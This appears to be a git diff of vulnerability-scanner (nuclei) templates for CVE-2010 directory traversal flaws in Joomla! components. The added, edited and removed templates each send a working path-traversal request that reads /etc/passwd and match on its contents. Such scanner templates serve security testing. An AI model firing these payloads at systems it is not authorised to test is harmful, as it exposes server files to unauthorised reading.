100644 --- a/nuclei-templates/CVE-2010/CVE-2010-0943.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-0943.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. reference: - https://www.exploit-db.com/exploits/11090 - https://www.cvedetails.com/cve/CVE-2010-0943 - - http://www.securityfocus.com/bid/37692 - - http://secunia.com/advisories/33486 - classification: - cve-id: CVE-2010-0943 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml b/nuclei-templates/CVE-2010/CVE-2010-0944.yaml new file mode 100644 index 0000000000..e3e41de5b4 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-0944.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0944 + +info: + name: Joomla! Component com_jcollection - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11088 + - https://www.cvedetails.com/cve/CVE-2010-0944 + - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt + - http://www.exploit-db.com/exploits/11088 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0944 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-1056.yaml b/nuclei-templates/CVE-2010/CVE-2010-1056.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1056.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1056.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml b/nuclei-templates/CVE-2010/CVE-2010-1217.yaml new file mode 100644 index 0000000000..40edd4a34c --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1217.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1217 + +info: + name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + reference: + - https://www.exploit-db.com/exploits/11814 + - https://www.cvedetails.com/cve/CVE-2010-1217 + - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt + - http://www.securityfocus.com/bid/38866 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1217 + tags: cve,cve2010,joomla,lfi,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-1219.yaml b/nuclei-templates/CVE-2010/CVE-2010-1219.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1219.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1219.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1302.yaml b/nuclei-templates/CVE-2010/CVE-2010-1302.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1302.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1302.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1304.yaml b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1304.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1304.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1305.yaml b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml deleted file mode 100644 index 4649188fed..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1305.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1305 - -info: - name: Joomla! Component JInventory 1.23.02 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12065 - - https://www.cvedetails.com/cve/CVE-2010-1305 - - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 - - http://secunia.com/advisories/39351 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1305 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1306.yaml b/nuclei-templates/CVE-2010/CVE-2010-1306.yaml new file mode 100644 index 0000000000..5979a5b672 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1306.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1306 + +info: + name: Joomla! Component Picasa 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12058 + - https://www.cvedetails.com/cve/CVE-2010-1306 + - http://secunia.com/advisories/39338 + - http://www.securityfocus.com/bid/39200 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1306 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1312.yaml b/nuclei-templates/CVE-2010/CVE-2010-1312.yaml index cc121bbc5f..022a54afd8 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1312.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1312.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12077 - https://www.cvedetails.com/cve/CVE-2010-1312 - - http://secunia.com/advisories/39289 - - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1312 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1313.yaml b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1313.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1313.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1340.yaml b/nuclei-templates/CVE-2010/CVE-2010-1340.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1340.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1340.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml index 0409f0399b..1e3d3663a4 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml @@ -4,26 +4,24 @@ info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. - reference: + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 - - http://www.securityfocus.com/bid/39504 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1461 tags: cve,cve2010,joomla,lfi,photo requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1469.yaml b/nuclei-templates/CVE-2010/CVE-2010-1469.yaml deleted file mode 100644 index b8370e009c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1469.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1469 - -info: - name: Joomla! Component JProject Manager 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12146 - - https://www.cvedetails.com/cve/CVE-2010-1469 - - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt - - http://www.exploit-db.com/exploits/12146 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1469 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml new file mode 100644 index 0000000000..bf37563f9b --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1470 + +info: + name: Joomla! Component Web TV 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12166 + - https://www.cvedetails.com/cve/CVE-2010-1470 + - http://secunia.com/advisories/39405 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1470 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml b/nuclei-templates/CVE-2010/CVE-2010-1473.yaml deleted file mode 100644 index 02b9972d70..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1473 - -info: - name: Joomla! Component Advertising 0.25 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12171 - - https://www.cvedetails.com/cve/CVE-2010-1473 - - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt - - http://secunia.com/advisories/39410 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1473 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1474.yaml b/nuclei-templates/CVE-2010/CVE-2010-1474.yaml new file mode 100644 index 0000000000..c7a14e2d70 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1474.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1474 + +info: + name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12182 + - https://www.cvedetails.com/cve/CVE-2010-1474 + - http://secunia.com/advisories/39388 + classification: + cve-id: CVE-2010-1474 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml deleted file mode 100644 index bb3e999cac..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1475 - -info: - name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12147 - - https://www.cvedetails.com/cve/CVE-2010-1475 - - http://secunia.com/advisories/39285 - classification: - cve-id: CVE-2010-1475 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1476.yaml b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml new file mode 100644 index 0000000000..156adbb01b --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1476 + +info: + name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12150 + - https://www.cvedetails.com/cve/CVE-2010-1476 + - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt + - http://www.alphaplug.com/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1476 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1478.yaml b/nuclei-templates/CVE-2010/CVE-2010-1478.yaml deleted file mode 100644 index e364de8273..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1478.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2010-1478 - -info: - name: Joomla! Component Jfeedback 1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12145 - - https://www.cvedetails.com/cve/CVE-2010-1478 - - http://secunia.com/advisories/39262 - - http://www.securityfocus.com/bid/39390 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1478 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml b/nuclei-templates/CVE-2010/CVE-2010-1531.yaml index d76282552f..c118f123cd 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1531.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component redSHOP 1.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12054 - https://www.cvedetails.com/cve/CVE-2010-1531 - - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt - - http://www.osvdb.org/63535 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1531 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1533.yaml b/nuclei-templates/CVE-2010/CVE-2010-1533.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1533.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1533.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1534.yaml b/nuclei-templates/CVE-2010/CVE-2010-1534.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1534.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1534.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml deleted file mode 100644 index 50d5e1c02d..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1540 - -info: - name: Joomla! Component com_blog - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: - - https://www.exploit-db.com/exploits/11625 - - https://www.cvedetails.com/cve/CVE-2010-1540 - - http://secunia.com/advisories/38777 - - http://www.securityfocus.com/bid/38530 - classification: - cve-id: CVE-2010-1540 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1601.yaml b/nuclei-templates/CVE-2010/CVE-2010-1601.yaml new file mode 100644 index 0000000000..492c29e5d9 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1601.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1601 + +info: + name: Joomla! Component JA Comment - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12236 + - https://www.cvedetails.com/cve/CVE-2010-1601 + - http://secunia.com/advisories/39472 + - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt + classification: + cve-id: CVE-2010-1601 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1603.yaml b/nuclei-templates/CVE-2010/CVE-2010-1603.yaml new file mode 100644 index 0000000000..0ec6686201 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1603.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-1603 + +info: + name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12284 + - https://www.cvedetails.com/cve/CVE-2010-1603 + - http://www.securityfocus.com/bid/39546 + - http://www.vupen.com/english/advisories/2010/0931 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1603 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1607.yaml b/nuclei-templates/CVE-2010/CVE-2010-1607.yaml deleted file mode 100644 index 54e1be5e91..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1607.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1607 - -info: - name: Joomla! Component WMI 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12316 - - https://www.cvedetails.com/cve/CVE-2010-1607 - - http://www.securityfocus.com/bid/39608 - - http://secunia.com/advisories/39539 - classification: - cve-id: CVE-2010-1607 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1657.yaml b/nuclei-templates/CVE-2010/CVE-2010-1657.yaml index 4c62d5a31c..b3bc8509e7 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1657.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1657.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 - - http://www.vupen.com/english/advisories/2010/1006 - - http://www.securityfocus.com/bid/39740 - classification: - cve-id: CVE-2010-1657 + - https://www.cvedetails.com/cve/CVE-2010-1657 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml deleted file mode 100644 index a97738faf3..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1715 - -info: - name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12174 - - https://www.cvedetails.com/cve/CVE-2010-1715 - - http://www.osvdb.org/63659 - - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - classification: - cve-id: CVE-2010-1715 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/CVE-2010/cve-2010-1717.yaml b/nuclei-templates/CVE-2010/CVE-2010-1717.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1717.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1717.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml b/nuclei-templates/CVE-2010/CVE-2010-1718.yaml index 330a7e33cf..5ebbc5844c 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1718.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12282 - https://www.cvedetails.com/cve/CVE-2010-1718 - - http://secunia.com/advisories/39521 - - http://www.securityfocus.com/bid/39545 - classification: - cve-id: CVE-2010-1718 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/cve-2010-1719.yaml b/nuclei-templates/CVE-2010/CVE-2010-1719.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1719.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1719.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1722.yaml b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1722.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1722.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1723.yaml b/nuclei-templates/CVE-2010/CVE-2010-1723.yaml new file mode 100644 index 0000000000..f548d05670 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1723.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1723 + +info: + name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12289 + - https://www.cvedetails.com/cve/CVE-2010-1723 + - http://secunia.com/advisories/39524 + classification: + cve-id: CVE-2010-1723 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 